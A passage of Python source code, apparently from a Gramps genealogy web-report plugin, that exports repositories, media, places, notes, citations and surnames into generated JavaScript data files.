list(self.obj_dict[Repository])\n\t\tif (not self.inc_repositories): repo_list = []\n\t\trepo_list.sort(key = lambda x: 
self.obj_dict[Repository][x][OBJDICT_INDEX])\n\t\tfor repo_handle in repo_list:\n\t\t\trepo = self.database.get_repository_from_handle(repo_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Repository][repo_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\tname = repo.get_name() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\\n\")\n\t\t\ttype = repo.get_type() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(str(type)) + \"\\\",\\n\")\n\t\t\t# Addresses\n\t\t\tsw.write(\"[\\n\" + self._data_addresses(repo) + \"\\n],\\n\")\n\t\t\t# Get repository notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(repo)) + \"\\\",\\n\")\n\t\t\t# Get repository URL\n\t\t\tsw.write(self._data_url_list(repo))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get source references\n\t\t\tsw.write(self._data_repo_backref_index(repo, Source))\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_repo.js\", sw.getvalue())\n\n\n\tdef _export_media(self):\n\t\t\"\"\"\n\t\tExport media data in Javascript file\n\t\tThe media data is stored in the Javascript Array \"M\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'M' is sorted by media title\\n\"\n\t\t\t\"// 'M' gives for each media object:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The media title\\n\"\n\t\t\t\"// - The media path in Gramps\\n\"\n\t\t\t\"// - The media path where the media is really located\\n\"\n\t\t\t\"// - The media MIME type\\n\"\n\t\t\t\"// - The media date\\n\"\n\t\t\t\"// - The media date in ISO format (sortable)\\n\"\n\t\t\t\"// - The media notes\\n\"\n\t\t\t\"// - A list of the media source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the media attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"// - Media thumbnail path\\n\"\n\t\t\t\"// - A list of the person referencing this media (including the person events referencing this media), in the form:\\n\"\n\t\t\t\"// - person index (in table 'I')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the family referencing this media (including the family events referencing this media), in the form:\\n\"\n\t\t\t\"// - family index (in table 'F')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the source referencing this media (including the source citations referencing this media), in the form:\\n\"\n\t\t\t\"// - source index (in table 'S')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the places referencing this media, in the form:\\n\"\n\t\t\t\"// - place index (in table 'P')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"M = [\")\n\t\tsep = \"\\n\"\n\t\tmedia_list = list(self.obj_dict[MediaObject])\n\t\tif (not self.inc_gallery): media_list = []\n\t\tmedia_list.sort(key = lambda x: self.obj_dict[MediaObject][x][OBJDICT_INDEX])\n\t\tfor media_handle in media_list:\n\t\t\tmedia = self.database.get_object_from_handle(media_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[MediaObject][media_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\ttitle = media.get_description() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(html_escape(title)) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + script_escape(media.get_path()) + \"\\\",\\n\")\n\t\t\tpath = self.get_media_web_path(media)\n\t\t\tsw.write(\"\\\"\" + script_escape(path) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + script_escape(media.get_mime_type()) + \"\\\",\\n\")\n\t\t\t# Get media date\n\t\t\tdate = format_date(media.get_date_object()) or \"\"\n\t\t\tsw.write(\"\\\"\" + date + \"\\\",\\n\")\n\t\t\tdate = format_date(media.get_date_object(), True) or \"\"\n\t\t\tsw.write(\"\\\"\" + date + \"\\\",\\n\")\n\t\t\t# Get media notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(media)) + \"\\\",\\n\")\n\t\t\t# Get media sources\n\t\t\tsw.write(self._data_source_citation_index(media))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get media attributes\n\t\t\tsw.write(self._data_attributes(media))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get media thumbnail\n\t\t\tsw.write(\"\\\"\" + self.copy_thumbnail(media, (0,0,100,100)) + \"\\\",\\n\")\n\t\t\t# Get media references\n\t\t\tsw.write(self._data_media_backref_index(media, Person))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_media_backref_index(media, Family))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_media_backref_index(media, Source))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_media_backref_index(media, Place))\n\t\t\tsw.write(\"\\n\")\n\t\t\tsw.write(\"]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_media.js\", sw.getvalue())\n\n\n\tdef _export_places(self):\n\t\t\"\"\"\n\t\tExport places data in Javascript file\n\t\tThe places data is stored in the Javascript Array \"P\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'P' is sorted by place name\\n\"\n\t\t\t\"// 'P' gives for each place:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The place name\\n\"\n\t\t\t\"// - The place location parts for the main and alternate names, in the form:\\n\"\n\t\t\t\"// (index 0 is main name, others are for alternate names)\\n\"\n\t\t\t\"// [street, locality, parish, city, state, county, zip, country]\\n\"\n\t\t\t\"// - The coordinates [latitude, longitude]\\n\"\n\t\t\t\"// - The place notes\\n\"\n\t\t\t\"// - A list of the place source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the place URL in the form:\\n\"\n\t\t\t\"// [type, url, description]\\n\"\n\t\t\t\"// - A list of the person index (in table 'I') for events referencing this place\\n\"\n\t\t\t\"// (including the persons directly referencing this place)\\n\"\n\t\t\t\"// - A list of the family index (in table 'F') for events referencing this place\\n\"\n\t\t\t\"P=[\")\n\t\tsep = \"\\n\"\n\t\tplace_list = list(self.obj_dict[Place])\n\t\tplace_list.sort(key = lambda x: self.obj_dict[Place][x][OBJDICT_INDEX])\n\t\tfor place_handle in place_list:\n\t\t\tplace = self.database.get_place_from_handle(place_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Place][place_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\tplace_name = 
report_utils.place_name(self.database, place_handle)\n\t\t\tsw.write(\"\\\"\" + script_escape(place_name) + \"\\\"\")\n\t\t\tif (not self.inc_places):\n\t\t\t\tsw.write(\"]\")\n\t\t\t\tsep = \",\\n\"\n\t\t\t\tcontinue\n\t\t\tsw.write(\",\\n\")\n\t\t\tlocations = []\n\t\t\tif (DWR_VERSION_410):\n\t\t\t\tml = get_main_location(self.database, place)\n\t\t\t\tloc = Location()\n\t\t\t\tloc.street = ml.get(PlaceType.STREET, '')\n\t\t\t\tloc.locality = ml.get(PlaceType.LOCALITY, '')\n\t\t\t\tloc.city = ml.get(PlaceType.CITY, '')\n\t\t\t\tloc.parish = ml.get(PlaceType.PARISH, '')\n\t\t\t\tloc.county = ml.get(PlaceType.COUNTY, '')\n\t\t\t\tloc.state = ml.get(PlaceType.STATE, '')\n\t\t\t\tloc.postal = place.get_code()\n\t\t\t\tloc.country = ml.get(PlaceType.COUNTRY, '')\n\t\t\t\tlocations.append(loc)\n\t\t\telse:\n\t\t\t\tif (place.main_loc):\n\t\t\t\t\tml = place.get_main_location()\n\t\t\t\t\tif (ml and not ml.is_empty()): locations.append(ml)\n\t\t\taltloc = place.get_alternate_locations()\n\t\t\tif (altloc):\n\t\t\t\taltloc = [nonempt for nonempt in altloc if (not nonempt.is_empty())]\n\t\t\t\tlocations += altloc\n\t\t\tloctabs = []\n\t\t\tfor loc in locations:\n\t\t\t\tloctab = [\n\t\t\t\t\tloc.street,\n\t\t\t\t\tloc.locality,\n\t\t\t\t\tloc.city,\n\t\t\t\t\tloc.parish,\n\t\t\t\t\tloc.county,\n\t\t\t\t\tloc.state,\n\t\t\t\t\tloc.postal,\n\t\t\t\t\tloc.country,\n\t\t\t\t]\n\t\t\t\tloctab = [(data or \"\") for data in loctab]\n\t\t\t\tloctab = [\"\\\"\" + script_escape(data) + \"\\\"\" for data in loctab]\n\t\t\t\tloctabs.append(\"[\" + \",\".join(loctab) + \"]\")\n\t\t\tsw.write(\"[\" + \",\".join(loctabs) + \"],\\n\")\n\t\t\tlatitude = place.get_latitude()\n\t\t\tlongitude = place.get_longitude()\n\t\t\tif (latitude and longitude):\n\t\t\t\tcoords = conv_lat_lon(latitude, longitude, \"D.D8\")\n\t\t\telse:\n\t\t\t\tcoords = (\"\", \"\")\n\t\t\tsw.write(\"[\\\"\" + \"\\\",\\\"\".join(coords) + \"\\\"]\\n,\")\n\t\t\t# Get place notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(place)) + \"\\\",\\n\")\n\t\t\t# Get place media\n\t\t\tsw.write(self._data_media_reference_index(place))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get place sources\n\t\t\tsw.write(self._data_source_citation_index(place))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get place URL\n\t\t\tsw.write(self._data_url_list(place))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get back references\n\t\t\tsw.write(self._data_bkref_index(Place, place_handle, Person))\n\t\t\tsw.write(\",\\n\")\n\t\t\tsw.write(self._data_bkref_index(Place, place_handle, Family))\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_place.js\", sw.getvalue())\n\n\n\tdef get_notes_text(self, object):\n\t\tif (not self.inc_notes): return(\"\")\n\t\tnotelist = object.get_note_list()\n\t\thtmllist = self.dump_notes(notelist)\n\t\tif (not htmllist): return(\"\")\n\t\treturn(html_text(htmllist))\n\n\n\tdef get_notes_attributes_text(self, notelist, attrlist):\n\t\tif (not self.inc_notes): return(\"\")\n\t\t# Get notes\n\t\thtmllist = self.dump_notes(notelist)\n\t\t# Get attributes\n\t\tfor attr in attrlist:\n\t\t\tif (not htmllist): htmllist = Html(\"div\")\n\t\t\thtmllist.extend(Html(\n\t\t\t\t\"p\", _(\"%(type)s: %(value)s\") % {\n\t\t\t\t'type': Html(\"b\", attr.get_type()),\n\t\t\t\t'value': attr.get_value()\n\t\t\t\t}\n\t\t\t))\n\t\t\t# Also output notes attached to the attributes\n\t\t\tnotelist2 = attr.get_note_list()\n\t\t\thtmlnotelist = self.dump_notes(notelist2)\n\t\t\tif (htmlnotelist): 
htmllist.extend(htmlnotelist)\n\t\tif (not htmllist): return(\"\")\n\t\treturn(html_text(htmllist))\n\n\n\tdef dump_notes(self, notelist):\n\t\t\"\"\"\n\t\tDump out a list of notes, adding very few elements of its own\n\n\t\t@param: notelist -- list of notes\n\t\t\"\"\"\n\t\tnotesection = None\n\t\tif (not notelist): return(notesection)\n\t\tif (not self.inc_notes): return(notesection)\n\t\tfor note_handle in notelist:\n\t\t\tif (not notesection): notesection = Html(\"div\")\n\t\t\tthis_note = self.database.get_note_from_handle(note_handle)\n\t\t\tif this_note is not None:\n\t\t\t\tif (self.print_notes_type):\n\t\t\t\t\tnotesection.extend(Html(\"i\", str(this_note.type), class_=\"NoteType\"))\n\t\t\t\tnotesection.extend(self.get_note_format(this_note))\n\t\treturn(notesection)\n\n\tdef get_note_format(self, note):\n\t\t\"\"\"\n\t\twill get the note from the database, and will return either the\n\t\tstyled text or plain note\n\t\t\"\"\"\n\t\ttext = \"\"\n\t\tif note is not None:\n\t\t\t# retrieve the body of the note\n\t\t\tnote_text = note.get()\n\t\t\t# styled notes\n\t\t\thtmlnotetext = self.styled_note(note.get_styledtext(),\n\t\t\t\t\t\t\t\t\t\t\tnote.get_format(), contains_html =\n\t\t\t\t\t\t\t\t\t\t\tnote.get_type() == NoteType.HTML_CODE)\n\t\t\ttext = htmlnotetext or Html(\"p\", note_text)\n\t\t# return text of the note to its callers\n\t\treturn(text)\n\n\tdef styled_note(self, styledtext, format, contains_html=False):\n\t\t\"\"\"\n\t\tstyledtext : assumed a StyledText object to write\n\t\tformat : = 0 : Flowed, = 1 : Preformatted\n\t\t\"\"\"\n\t\ttext = str(styledtext)\n\n\t\tif (not text): return('')\n\n\t\ts_tags = styledtext.get_tags()\n\t\thtmllist = Html(\"div\", class_=\"grampsstylednote\")\n\t\tif contains_html:\n\t\t\tmarkuptext = self._backend.add_markup_from_styled(text,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t s_tags,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t split='\\n',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t escape=False)\n\t\t\thtmllist += markuptext\n\t\telse:\n\t\t\tmarkuptext = self._backend.add_markup_from_styled(text,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t s_tags,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t split='\\n')\n\t\t\tlinelist = []\n\t\t\tlinenb = 1\n\t\t\tsigcount = 0\n\t\t\tfor line in markuptext.split('\\n'):\n\t\t\t\t[line, sigcount] = process_spaces(line, format)\n\t\t\t\tif sigcount == 0:\n\t\t\t\t\t# The rendering of an empty paragraph '<p></p>'\n\t\t\t\t\t# is undefined so we use a non-breaking space\n\t\t\t\t\tif linenb == 1:\n\t\t\t\t\t\tlinelist.append('&nbsp;')\n\t\t\t\t\thtmllist.extend(Html('p') + linelist)\n\t\t\t\t\tlinelist = []\n\t\t\t\t\tlinenb = 1\n\t\t\t\telse:\n\t\t\t\t\tif linenb > 1:\n\t\t\t\t\t\tlinelist[-1] += '<br>'\n\t\t\t\t\tlinelist.append(line)\n\t\t\t\t\tlinenb += 1\n\t\t\tif linenb > 1:\n\t\t\t\thtmllist.extend(Html('p') + linelist)\n\t\t\t# if the last line was blank, then as well as outputting the previous para,\n\t\t\t# which we have just done,\n\t\t\t# we also output a new blank para\n\t\t\tif sigcount == 0:\n\t\t\t\tlinelist = [\"&nbsp;\"]\n\t\t\t\thtmllist.extend(Html('p') + linelist)\n\t\treturn(htmllist)\n\n\n\tdef _data_source_citation_index(self, object):\n\t\t\"\"\"\n\t\tExport sources citations indexes related to L{object}\n\t\tSee L{_data_source_citation_index_from_list}\n\t\t\"\"\"\n\t\tcitationlist = object.get_citation_list()\n\t\treturn(self._data_source_citation_index_from_list(citationlist))\n\n\tdef _data_source_citation_index_from_list(self, citationlist):\n\t\t\"\"\"\n\t\tList sources citations indexes of the L{citationlist} in a string representing a Javascript Array\n\t\t@return: citations indexes as a string representing a Javascript Array\n\t\t\"\"\"\n\t\tif (not self.inc_sources): return(\"[]\")\n\t\tif not citationlist: return(\"[]\")\n\t\tsep = \"\"\n\t\ttxt = \"[\"\n\t\tfor citation_handle in citationlist:\n\t\t\tcitation = self.database.get_citation_from_handle(citation_handle)\n\t\t\tif (citation is not None and (citation_handle in self.obj_dict[Citation])):\n\t\t\t\tsource_handle = citation.get_reference_handle()\n\t\t\t\tsource = self.database.get_source_from_handle(source_handle)\n\t\t\t\tif (source is not None and (source_handle in self.obj_dict[Source])):\n\t\t\t\t\ttitle = source.get_title()\n\t\t\t\t\tif (not title): title = source.get_gramps_id()\n\t\t\t\t\ttxt += sep + str(self.obj_dict[Citation][citation_handle][OBJDICT_INDEX])\n\t\t\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _data_repo_reference_index(self, object):\n\t\t\"\"\"\n\t\tBuild a list of the repositories references index, in the form given by L{_data_repo_ref}\n\t\t\"\"\"\n\t\tif (not self.inc_repositories): return(\"[]\")\n\t\trefs = object.get_reporef_list()\n\t\tif (not refs): return(\"[]\")\n\t\tsep = \"\\n\"\n\t\ttxt = \"[\"\n\t\tfor ref in refs:\n\t\t\trepo_handle = ref.get_reference_handle()\n\t\t\tif (repo_handle in self.obj_dict[Repository]):\n\t\t\t\ttxt += sep + \"\\t\" + self._data_repo_ref(ref, self.obj_dict[Repository][repo_handle][OBJDICT_INDEX])\n\t\t\t\tsep = \",\\n\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_repo_ref(self, ref, index):\n\t\t\"\"\"\n\t\tBuild a repository reference, in the form:\n\t\t - repository index (in table 'R')\n\t\t - media type\n\t\t - call number\n\t\t - notes of the repository reference\n\t\t\"\"\"\n\t\trepo_handle = ref.get_reference_handle()\n\t\trepo = self.database.get_repository_from_handle(repo_handle)\n\t\ttxt = \"[\"\n\t\ttxt += str(index) + \",\"\n\t\ttxt += \"\\\"\" + script_escape(str(ref.get_media_type())) + \"\\\",\"\n\t\ttxt += \"\\\"\" + script_escape(ref.get_call_number()) + \"\\\",\"\n\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(ref)) + \"\\\"\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _data_media_reference_index(self, object):\n\t\t\"\"\"\n\t\tBuild a list of the media references index, in the form given by L{_data_media_ref}\n\t\t\"\"\"\n\t\tif (not self.inc_gallery): return(\"[]\")\n\t\trefs = object.get_media_list()\n\t\tif (not refs): return(\"[]\")\n\t\tsep = \"\\n\"\n\t\ttxt = \"[\"\n\t\tfor ref in refs:\n\t\t\tmedia_handle = ref.get_reference_handle()\n\t\t\tif (media_handle in self.obj_dict[MediaObject]):\n\t\t\t\ttxt += sep + \"\\t\" + 
self._data_media_ref(ref, self.obj_dict[MediaObject][media_handle][OBJDICT_INDEX])\n\t\t\t\tsep = \",\\n\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_media_ref(self, ref, index):\n\t\t\"\"\"\n\t\tBuild a media reference, in the form:\n\t\t - media index (in table 'M')\n\t\t - media thumbnail path\n\t\t - [x1, y1, x2, y2] of the media reference\n\t\t - notes of the media reference\n\t\t - list of the media reference source citations index (in table 'C')\n\t\t\"\"\"\n\t\tmedia_handle = ref.get_reference_handle()\n\t\tmedia = self.database.get_object_from_handle(media_handle)\n\t\ttxt = \"[\"\n\t\ttxt += str(index)\n\t\ttxt += \",\\\"\"\n\t\ttxt += self.copy_thumbnail(media, ref.get_rectangle())\n\t\ttxt += \"\\\",[\"\n\t\trect = ref.get_rectangle() or (0,0,100,100)\n\t\ttxt += \",\".join(str(x) for x in rect)\n\t\ttxt += \"],\"\n\t\tattrlist = ref.get_attribute_list()\n\t\ttxt += \"\\\"\" + script_escape(self.get_notes_attributes_text(ref.get_note_list(), attrlist)) + \"\\\",\"\n\t\tcitationlist = ref.get_citation_list()\n\t\tfor attr in attrlist: citationlist.extend(attr.get_citation_list())\n\t\t# BUG: it seems that attribute references are given by both ref.get_citation_list and attr.get_citation_list\n\t\ttxt += self._data_source_citation_index_from_list(citationlist)\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef get_media_web_path(self, media):\n\t\t\"\"\"\n\t\tReturn the path of the media from the web pages\n\t\tThis function could be called several times for the same media\n\t\tThis function copies the media to the web pages directories if necessary\n\t\t\"\"\"\n\t\tmedia_path = media.get_path()\n\t\tif (media_path):\n\t\t\tnorm_path = media_path_full(self.database, media_path)\n\t\t\tif (os.path.isfile(norm_path)):\n\t\t\t\tif (self.copy_media):\n\t\t\t\t\text = os.path.splitext(norm_path)[1]\n\t\t\t\t\tiname = str(media.get_handle()) + ext\n\t\t\t\t\tiname = iname.lower()\n\t\t\t\t\tif (iname not in self.images_copied):\n\t\t\t\t\t\tself.copy_file(norm_path, iname, \"image\")\n\t\t\t\t\t\tself.images_copied.add(iname)\n\t\t\t\t\tweb_path = \"image/\" + iname\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tweb_path = os.path.relpath(norm_path, self.target_path)\n\t\t\t\t\t\tweb_path = web_path.replace(\"\\\\\", \"/\")\n\t\t\t\t\texcept:\n\t\t\t\t\t\tweb_path = urlparse.urljoin('file:', urllib.pathname2url(norm_path))\n\t\t\t\t\t\tlog.warning(_(\"Impossible to convert \\\"%(path)s\\\" to a relative path.\") % {\"path\": norm_path})\n\t\t\t\treturn(web_path)\n\t\tlog.warning(\"Warning: File not found \\\"%(path)s\\\"\" % {\"path\": str(media_path)})\n\t\treturn(media_path)\n\n\n\tdef copy_thumbnail(self, media, region = None):\n\t\t\"\"\"\n\t\tGiven a handle (and optional region) make (if needed) an\n\t\tup-to-date cache of a thumbnail, and call copy_file\n\t\tto copy the cached thumbnail to the website.\n\t\tReturn the new path to the image.\n\t\t\"\"\"\n\t\tif (region and region[0] == 0 and region[1] == 0 and region[2] == 100 and region[3] == 100):\n\t\t\tregion = None\n\t\thandle = media.get_handle()\n\t\ttname = handle + ((\"-%d,%d-%d,%d.png\" % region) if region else \".png\")\n\t\tif (media.get_mime_type()):\n\t\t\tfrom_path = get_thumbnail_path(\n\t\t\t\tmedia_path_full(self.database, media.get_path()),\n\t\t\t\tmedia.get_mime_type(),\n\t\t\t\tregion)\n\t\t\tif not os.path.isfile(from_path):\n\t\t\t\tfrom_path = os.path.join(IMAGE_DIR, \"document.png\")\n\t\telse:\n\t\t\tfrom_path = os.path.join(IMAGE_DIR, \"document.png\")\n\t\tif (tname not in 
self.thumbnail_created):\n\t\t\tself.copy_file(from_path, tname, \"thumb\")\n\t\t\tself.thumbnail_created.add(tname)\n\t\tweb_path = \"thumb/\" + tname\n\t\treturn(web_path)\n\n\n\tdef _data_attributes(self, object):\n\t\t\"\"\"\n\t\tBuild the list of the L{object} attributes as a Javascript string, in the form:\n\t\t [attribute, value, note, list of citations]\n\t\t\"\"\"\n\t\tattrlist = object.get_attribute_list()\n\t\ttxt = \"[\"\n\t\tsep = \"\"\n\t\tfor attr in attrlist:\n\t\t\ttxt += sep + \"[\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_type())) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_value())) + \"\\\",\"\n\t\t\t# Get attribute notes\n\t\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(attr)) + \"\\\",\"\n\t\t\t# Get attribute sources\n\t\t\ttxt += self._data_source_citation_index(attr)\n\t\t\ttxt += \"]\"\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_attributes_src(self, source):\n\t\t\"\"\"\n\t\tBuild the list of the L{source} sources attributes as a Javascript string, in the form:\n\t\t [attribute, value, \"\", []]\n\t\t\"\"\"\n\t\tattrlist = source.get_attribute_list()\n\t\ttxt = \"[\"\n\t\tsep = \"\"\n\t\tfor attr in attrlist:\n\t\t\ttxt += sep + \"[\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_type())) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(str(attr.get_value())) + \"\\\",\"\n\t\t\t# There aren't any attribute notes\n\t\t\ttxt += \"\\\"\\\",\"\n\t\t\t# There aren't any attribute sources\n\t\t\ttxt += \"[]\"\n\t\t\ttxt += \"]\"\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_url_list(self, object):\n\t\t\"\"\"\n\t\tBuild the list of the L{object} URL as a Javascript string, in the form:\n\t\t [type, url, description]\n\t\t\"\"\"\n\t\turllist = object.get_url_list()\n\t\ttxt = \"[\"\n\t\tsep = \"\"\n\t\tfor url in urllist:\n\t\t\t_type = url.get_type()\n\t\t\turi = url.get_path()\n\t\t\tdescr = url.get_description()\n\t\t\t# Email address\n\t\t\tif _type == UrlType.EMAIL:\n\t\t\t\tif not uri.startswith(\"mailto:\"):\n\t\t\t\t\turi = \"mailto:%(email)s\" % { 'email' : uri }\n\t\t\t# Web Site address\n\t\t\telif _type == UrlType.WEB_HOME:\n\t\t\t\tif not (uri.startswith(\"http://\") or uri.startswith(\"https://\")):\n\t\t\t\t\turi = \"http://%(website)s\" % { \"website\" : uri }\n\t\t\t# FTP server address\n\t\t\telif _type == UrlType.WEB_FTP:\n\t\t\t\tif not (uri.startswith(\"ftp://\") or uri.startswith(\"ftps://\")):\n\t\t\t\t\turi = \"ftp://%(ftpsite)s\" % { \"ftpsite\" : uri }\n\t\t\ttxt += sep + \"[\"\n\t\t\ttxt += \"\\\"\" + str(_type) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(uri) + \"\\\",\"\n\t\t\ttxt += \"\\\"\" + script_escape(descr) + \"\\\"\"\n\t\t\ttxt += \"]\"\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _export_surnames(self):\n\t\t\"\"\"\n\t\tExport surnames data in Javascript file\n\t\tThe surnames data is stored in the Javascript Array \"SN\"\n\t\t\"\"\"\n\t\t# Extract the surnames data\n\t\tsurnames = defaultdict(list) #: Dictionary giving for each surname: the list of person handles with this surname\n\t\tsortnames = {} #: Dictionary giving for each person handle: a sortable string for the person\n\t\tperson_list = list(self.obj_dict[Person].keys())\n\t\tfor person_handle in person_list:\n\t\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\t\tprimary_name = person.get_primary_name()\n\t\t\tif (primary_name.group_as):\n\t\t\t\tsurname = primary_name.group_as\n\t\t\telse:\n\t\t\t\tsurname = 
self.database.get_name_group_mapping(_nd.primary_surname(primary_name))\n\t\t\t# Treat people who have no name with those whose name is just 'whitespace'\n\t\t\tif (surname is None or surname.isspace()):\n\t\t\t\tsurname = \"\"\n\t\t\tsortnames[person_handle] = _nd.sort_string(primary_name)\n\t\t\tsurnames[surname].append(person_handle)\n\t\t# Sort surnames\n\t\tsurns_keys = list(surnames.keys())\n\t\tsurns_keys.sort(key = SORT_KEY)\n\t\t# Generate the file\n\t\tsw1 = StringIO()\n\t\tsw1.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'SN' is sorted by surname\\n\"\n\t\t\t\"// 'SN' gives for each surname:\\n\"\n\t\t\t\"// - the surname\\n\"\n\t\t\t\"// - the surname first letter\\n\"\n\t\t\t\"// - the list of person index (in table 'I') with this surname\\n\"\n\t\t\t\"\\nSN = [\")\n\t\tsep = \"\\n\"\n\t\tfor s in surns_keys:\n\t\t\t# Sort persons\n\t\t\tsurnames[s].sort(key = lambda x: sortnames[x])\n\t\t\ttab = \",\".join([str(self.obj_dict[Person][x][OBJDICT_INDEX]) for x in surnames[s]])\n\t\t\tsw1.write(sep + \"[\\\"\" + script_escape(s) + \"\\\", \\\"\" + first_letter(s).strip() + \"\\\", [\" + tab + \"]]\")\n\t\t\tsep = \",\\n\"\n\t\tsw1.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_surns.js\", sw1.getvalue())\n\n\n\tdef _data_families_index(self, person):\n\t\tfams = []\n\t\tfamily_list = person.get_family_handle_list()\n\t\tif (family_list):\n\t\t\tfams = [self.obj_dict[Family][family_handle][OBJDICT_INDEX] for family_handle in family_list if (family_handle in self.obj_dict[Family])]\n\t\treturn(\n\t\t\t\"[\" +\n\t\t\t\",\".join([str(i) for i in fams]) +\n\t\t\t\"]\")\n\n\tdef _data_partners_index(self, family):\n\t\tindis = []\n\t\tperson_handle = family.get_father_handle()\n\t\tif (person_handle and (person_handle in self.obj_dict[Person])):\n\t\t\tindis.append(self.obj_dict[Person][person_handle][OBJDICT_INDEX])\n\t\tperson_handle = family.get_mother_handle()\n\t\tif (person_handle and (person_handle in self.obj_dict[Person])):\n\t\t\tindis.append(self.obj_dict[Person][person_handle][OBJDICT_INDEX])\n\t\treturn(\n\t\t\t\"[\" +\n\t\t\t\",\".join([str(i) for i in indis]) +\n\t\t\t\"]\")\n\n\tdef _data_parents_families_index(self, person):\n\t\tlinks = []\n\t\tfamily_list = person.get_parent_family_handle_list()\n\t\tif (family_list):\n\t\t\tfor family_handle in family_list:\n\t\t\t\tif (family_handle not in self.obj_dict[Family]): continue\n\t\t\t\tfamily = self.database.get_family_from_handle(family_handle)\n\t\t\t\tchild_refs = [\n\t\t\t\t\tchild_ref\n\t\t\t\t\tfor child_ref in family.get_child_ref_list()\n\t\t\t\t\tif (child_ref.ref == person.get_handle())\n\t\t\t\t]\n\t\t\t\tif (len(child_refs) >= 1):\n\t\t\t\t\tindex = self.obj_dict[Family][family_handle][OBJDICT_INDEX]\n\t\t\t\t\tlinks.append(self._data_child_ref(index, child_refs[0]))\n\t\treturn(\"[\" + \",\".join(links) + \"]\")\n\n\tdef _data_children_index(self, family):\n\t\tlinks = 